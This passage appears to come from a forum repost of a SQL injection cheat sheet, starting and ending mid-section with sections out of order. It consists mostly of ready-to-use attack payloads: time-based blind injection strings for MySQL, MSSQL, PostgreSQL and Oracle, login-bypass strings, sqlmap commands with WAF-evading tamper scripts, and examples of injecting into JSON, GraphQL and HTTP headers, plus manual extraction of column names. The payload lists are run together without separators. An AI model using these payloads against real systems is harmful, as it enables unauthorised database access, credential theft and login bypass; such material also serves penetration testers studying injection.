(ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=115) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=51) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=114) WAITFOR DELAY '00:00:5'-- (+5 seconds)Column Name = 117,115,51,114 = userPostgresql Blind SQLI(Stacked Queries):id=1; select pg_sleep(5);-- -1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(5) end;-- -
8.Blind Sql injection exploitation via sqlmap:
sqlmap -r req.txt -v 3 --time-sec=5 --technique=T --current-dbsqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --current-dbsqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=BT --current-db
9.Blind Sql injection WAF bypass (tamper):
Example:sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-dbMysql,Mssql,Postgresql,Oracle (Blind):betweenMysql (Blind):ifnull2casewhenisnullifnull2ifisnullMysql,Mssql,Postgresql,Oracle (Blind):charencodeMysql,Mssql,Postgresql (Blind):charunicodeencodeMysql (Blind):commalesslimitcommalessmidMysql (Blind):escapequotesUTF-8 (Blind):apostrophemaskoverlongutf8overlongutf8moreBypass waf in JSON (Blind):charunicodeescapeMysql,Postgresql,Oracle (Blind):greatestCloudfare waf (Blind):xforwardedfor
And
Quick SQLMap Tamper Suggester:You must be logged in to see this link.
10.Sql detection payload (Generic Error):
'"'"./\%5c%27%22%23%3B)")')))"))'))#;''```,""//\\%%00||0.or-1%23'or-1%23#Detection source:["SQL syntax.*MySQL", "Warning.*mysql_.*", "valid MySQL result", "MySqlClient\."]["PostgreSQL.*ERROR", "Warning.*\Wpg_.*", "valid PostgreSQL result", "Npgsql\."]["Driver.* SQL[\-\_\ ]*Server", "OLE DB.* SQL Server", "(\W|\A)SQL Server.*Driver", "Warning.*mssql_.*", "(\W|\A)SQL Server.*[0-9a-fA-F]{8}", "(?s)Exception.*\WSystem\.Data\.SqlClient\.", "(?s)Exception.*\WRoadhouse\.Cms\."]["Microsoft Access Driver", "JET Database Engine", "Access Database Engine"]["\bORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*Driver", "Warning.*\Woci_.*", "Warning.*\Wora_.*"]["CLI Driver.*DB2", "DB2 SQL error", "\bdb2_\w+\("]["SQLite/JDBCDriver", "SQLite.Exception", "System.Data.SQLite.SQLiteException", "Warning.*sqlite_.*", "Warning.*SQLite3::", "\[SQLITE_ERROR\]"]["(?i)Warning.*sybase.*", "Sybase message", "Sybase.*Server message.*"]
11.SQL Injection Auth Bypass:
'=' 'or'' or ''='/1#\'-'' ''&''^''*'' or ''-'' or '' '' or ''&'' or ''^'' or ''*'"-"" ""&""^""*"" or ""-"" or "" "" or ""&"" or ""^"" or ""*"or true--" or true--' or true--") or true--') or true--admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin") or ("1"="1admin") or ("1"="1"--admin") or ("1"="1"#admin") or ("1"="1"/*admin") or "1"="1admin") or "1"="1"--admin") or "1"="1"#admin") or "1"="1"/*' or 'x'='x') or ('x')=('x')) or (('x'))=(('x" or "x"="x") or ("x")=("x")) or (("x"))=(("x1'or'1'='1or 1=1or 1=1--or 1=1#or 1=1/*admin' or '1'='1'/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin') or '1'='1admin') or '1'='1'--admin') or '1'='1'#admin') or '1'='1'/*admin" --admin" #admin"/*admin" or "1"="1admin" or "1"="1"--admin" or "1"="1"#admin" or "1"="1"/*admin"or 1=1 or ""="admin" or 1=1admin" or 1=1--admin" or 1=1#admin" or 1=1/*
- Time-based Blind SQLi : Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. epending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.
Time Based (GET,POST,PUT)
Apply on:
SearchFirst name, last name, number, any kind of date, Email or Password (register, login, reset password)Any kind of Product,menu,keyword,paymentCookie,User agent,Referer,X-Forwarded-For
Parameter list (regular):
HTML:
idcidpidpagesearchusernamenameregisterfirst namelast nameemailpasspassworddircategoryclassregisterfilenewsitemmenulangnamereftitletimeviewtopicthreadtypedateformjoinmainnavregionselectreportroleupdatequeryusersortwhereparamsprocessrowtablefromresultssleepfetchorderkeywordcolumnfielddeletestringnumberfilterPayload list:
MySQL Blind (Time Based):
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Zif(now()=sysdate(),sleep(5),0)'XOR(if(now()=sysdate(),sleep(5),0))XOR''XOR(if(now()=sysdate(),sleep(5*1),0))OR'0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/%2c(select%5*%5from%5(select(sleep(5)))a)(select(0)from(select(sleep(5)))v)(SELECT SLEEP(5))'%2b(select*from(select(sleep(5)))a)%2b'(select*from(select(sleep(5)))a)1'%2b(select*from(select(sleep(5)))a)%2b',(select * from (select(sleep(5)))a)desc%2c(select*from(select(sleep(5)))a)-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))(SELECT * FROM (SELECT(SLEEP(5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(5)))a)+'(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/',''),/*test*/%26%26%09sLeEp(5)%09--+AND BLIND:1 and sleep 5--1 and sleep 51 and sleep(5)--1 and sleep(5)' and sleep 5--' and sleep 5' and sleep 5 and '1'='1' and sleep(5) and '1'='1' and sleep(5)--' and sleep(5)' AnD SLEEP(5) ANd '1and sleep 5--and sleep 5and sleep(5)--and sleep(5)and SELECT SLEEP(5); #AnD SLEEP(5)AnD SLEEP(5)--AnD SLEEP(5)# and sleep 5-- and sleep 5 and sleep(5)-- and sleep(5) and SELECT SLEEP(5); #' AND SLEEP(5)#" AND SLEEP(5)#') AND SLEEP(5)#OR BLIND
r sleep 5--or sleep 5or sleep(5)--or sleep(5)or SELECT SLEEP(5); #or SLEEP(5)or SLEEP(5)#or SLEEP(5)--or SLEEP(5)="or SLEEP(5)=' or sleep 5-- or sleep 5 or sleep(5)-- or sleep(5) or SELECT SLEEP(5); #' OR SLEEP(5)#" OR SLEEP(5)#') OR SLEEP(5)#You can replace AND / OR1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=13371 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=13371 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 13371 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RLIKE BLIND:You can replace AND / ORRLIKE SLEEP(5)--' RLIKE SLEEP(5)--' RLIKE SLEEP(5)-- 1337" RLIKE SLEEP(5)-- 1337') RLIKE SLEEP(5)-- 1337') RLIKE SLEEP(5) AND ('1337'='1337')) RLIKE SLEEP(5) AND (('1337'='1337'))) RLIKE SLEEP(5) AND ((('1337'='1337) RLIKE SLEEP(5)-- 1337) RLIKE SLEEP(5) AND (1337=1337)) RLIKE SLEEP(5) AND ((1337=1337))) RLIKE SLEEP(5) AND (((1337=13371 RLIKE SLEEP(5)1 RLIKE SLEEP(5)-- 13371 RLIKE SLEEP(5)# 1337) WHERE 1337=1337 RLIKE SLEEP(5)-- 13371 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337' RLIKE SLEEP(5) AND '1337'='1337') RLIKE SLEEP(5) AND ('1337' LIKE '1337')) RLIKE SLEEP(5) AND (('1337' LIKE '1337'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337%' RLIKE SLEEP(5) AND '1337%'='1337' RLIKE SLEEP(5) AND '1337' LIKE '1337") RLIKE SLEEP(5) AND ("1337"="1337")) RLIKE SLEEP(5) AND (("1337"="1337"))) RLIKE SLEEP(5) AND ((("1337"="1337" RLIKE SLEEP(5) AND "1337"="1337") RLIKE SLEEP(5) AND ("1337" LIKE "1337")) RLIKE SLEEP(5) AND (("1337" LIKE "1337"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337" RLIKE SLEEP(5) AND "1337" LIKE "1337' RLIKE SLEEP(5) OR '1337'='1337') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337ELT Blind:You can replace AND / OR' AND ELT(1337=1337,SLEEP(5))--' AND ELT(1337=1337,SLEEP(5))-- 1337" AND ELT(1337=1337,SLEEP(5))-- 1337') AND ELT(1337=1337,SLEEP(5))-- 1337') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337) AND ELT(1337=1337,SLEEP(5))-- 1337) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=13371 AND ELT(1337=1337,SLEEP(5))1 AND ELT(1337=1337,SLEEP(5))-- 13371 AND ELT(1337=1337,SLEEP(5))# 1337) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13371 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13371`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||''||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||''+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337BENCHMARK:You can replace AND / OR' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337') AND =BENCHMARK(5000000,MD5(0x774c5341))--') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337Microsoft SQL Server Blind (Time Based):
;waitfor delay '0:0:5'--';WAITFOR DELAY '0:0:5'--);waitfor delay '0:0:5'--';waitfor delay '0:0:5'--";waitfor delay '0:0:5'--');waitfor delay '0:0:5'--");waitfor delay '0:0:5'--));waitfor delay '0:0:5'--'));waitfor delay '0:0:5'--"));waitfor delay '0:0:5'--") IF (1=1) WAITFOR DELAY '0:0:5'--';%5waitfor%5delay%5'0:0:5'%5--%5' WAITFOR DELAY '0:0:5'--' WAITFOR DELAY '0:0:5'or WAITFOR DELAY '0:0:5'--or WAITFOR DELAY '0:0:5'and WAITFOR DELAY '0:0:5'--and WAITFOR DELAY '0:0:5'WAITFOR DELAY '0:0:5';WAITFOR DELAY '0:0:5'--;WAITFOR DELAY '0:0:5'1 WAITFOR DELAY '0:0:5'--1 WAITFOR DELAY '0:0:5'1 WAITFOR DELAY '0:0:5'-- 13371' WAITFOR DELAY '0:0:5' AND '1337'='13371') WAITFOR DELAY '0:0:5' AND ('1337'='13371) WAITFOR DELAY '0:0:5' AND (1337=1337') WAITFOR DELAY '0:0:5'--" WAITFOR DELAY '0:0:5'--')) WAITFOR DELAY '0:0:5'--'))) WAITFOR DELAY '0:0:5'--%' WAITFOR DELAY '0:0:5'--") WAITFOR DELAY '0:0:5'--")) WAITFOR DELAY '0:0:5'--"))) WAITFOR DELAY '0:0:5'--
Postgresql Blind (Time Based):
";SELECT pg_sleep(5);;SELECT pg_sleep(5);and SELECT pg_sleep(5);1 SELECT pg_sleep(5);or SELECT pg_sleep(5);(SELECT pg_sleep(5))pg_sleep(5)--1 or pg_sleep(5)--" or pg_sleep(5)--' or pg_sleep(5)--1) or pg_sleep(5)--") or pg_sleep(5)--') or pg_sleep(5)--1)) or pg_sleep(5)--")) or pg_sleep(5)--')) or pg_sleep(5)--pg_SLEEP(5)pg_SLEEP(5)--pg_SLEEP(5)#or pg_SLEEP(5)or pg_SLEEP(5)--or pg_SLEEP(5)#' SELECT pg_sleep(5);or SELECT pg_sleep(5);' SELECT pg_sleep(5);1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 13371' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='13371') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='13371) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
Oracle Blind (Time Based):
You can replace AND / OR
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337
Generic Time Based SQL Injection Payloads:
sleep(5)#(sleep 5)--(sleep 5)(sleep(5))--(sleep(5))-sleep(5)SLEEP(5)#SLEEP(5)--SLEEP(5)="SLEEP(5)='";sleep 5--";sleep 5";sleep(5)--";sleep(5)";SELECT SLEEP(5); #1 SELECT SLEEP(5); #+ SLEEP(5) + '&&SLEEP(5)&&SLEEP(5)--&&SLEEP(5)#;sleep 5--;sleep 5;sleep(5)--;sleep(5);SELECT SLEEP(5); #'&&SLEEP(5)&&'1' SELECT SLEEP(5); #benchmark(50000000,MD5(1))benchmark(50000000,MD5(1))--benchmark(50000000,MD5(1))#or benchmark(50000000,MD5(1))or benchmark(50000000,MD5(1))--or benchmark(50000000,MD5(1))#ORDER BY SLEEP(5)ORDER BY SLEEP(5)--ORDER BY SLEEP(5)#AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RANDOMBLOB(500000000/2)AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))RANDOMBLOB(1000000000/2)AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
If response delay between 5 to 7 Seconds .It means vulnerable.
Detection and exploitation:
1.=payload
Example:
=0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z=(select(0)from(select(sleep(5)))v)email=test@gmail.com' WAITFOR DELAY '0:0:5'--email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
2.=value payload
Example:
=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='=1'XOR(if(now()=sysdate(),sleep(5),0))OR'=1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337 =1 or sleep(5)#
Mysql blind sql injection (time based):
email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
[IMG]https://miro.medium.com/v2/resize:fit:700/1*D9i4iyfJ62mnQeOtPfsAWg.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*EwylY6hqMBpTJXRq8BLgTA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:392/1*UWGw-50xZC3wRYg_dklGPA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*S4Bb8Nleps-hoSUdu9w5oA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*PCaJrmljJDXWdIqU3GA9FQ.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*urhLRTDBPrpdukkcaelt2Q.jpeg[/IMG]
MSSQL blind Sql injection (time based):
email=test@gmail.com' WAITFOR DELAY '0:0:5'--
[IMG]https://miro.medium.com/v2/resize:fit:700/1*CdNLKLDfXfpECqwOr6Ecfg.png[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*cErDfVAS9BHyLBOIOzav2Q.png[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*XinsHBIpDcqZ6xj6HC1-Bg.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*-S9Is3nbZTUkri6wR588kQ.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*JRRt82kcpPa1vXP8zMdpGw.jpeg[/IMG]
3.https://redact.com/page/payloadhttps://redact.com/page/value payload
Example:
You must be logged in to see this link."XOR(if(now()=sysdate(),sleep(3),0))OR"/https://redact.com/(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"You must be logged in to see this link. AnD SLEEP(5)You must be logged in to see this link.' ORDER BY SLEEP(5)
[IMG]https://miro.medium.com/v2/resize:fit:700/1*MX6EySiEHrusRBDdBk2NMA.jpeg[/IMG]
4.Blind Sql injection in json:
{payload}
[payload]
{value payload}
Example:
[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]{AnD SLEEP(5)}{1 AnD SLEEP(5)}{1' AnD SLEEP(5)--}{sleep 5}"emails":["AnD SLEEP(5)"]"emails":["test@gmail.com' OR SLEEP(5)#"]{"options":{"id":[],"emails":["AnD SLEEP(5)"],
5.Blind Sql injection in Graphql:
{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name Payload”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}
Example:
{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name AND sleep(5)","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
6.Http header based (Error based,Time Based):
Referer: https://https://redact.com/408685756payload
Cookie: _gcl_au=1.1.2127391584.1587087463paylaod
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87Payload
or
Referer: https://https://redact.com/408685756 payload
Cookie: _gcl_au=1.1.2127391584.1587087463 paylaod
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Payload
X-Forwarded-For: paylaod
Mysql Error Based:
[IMG]https://miro.medium.com/v2/resize:fit:700/1*u9-N09vB98GeqnEuLqPQCQ.jpeg[/IMG]
Mysql Error Based
Mssql Error Based:
[IMG]https://miro.medium.com/v2/resize:fit:700/1*QkLcrAGYZARVxDv_jBArYg.jpeg[/IMG]
Mssql Error Based
7.Blind Sql injection exploitation (Manual):
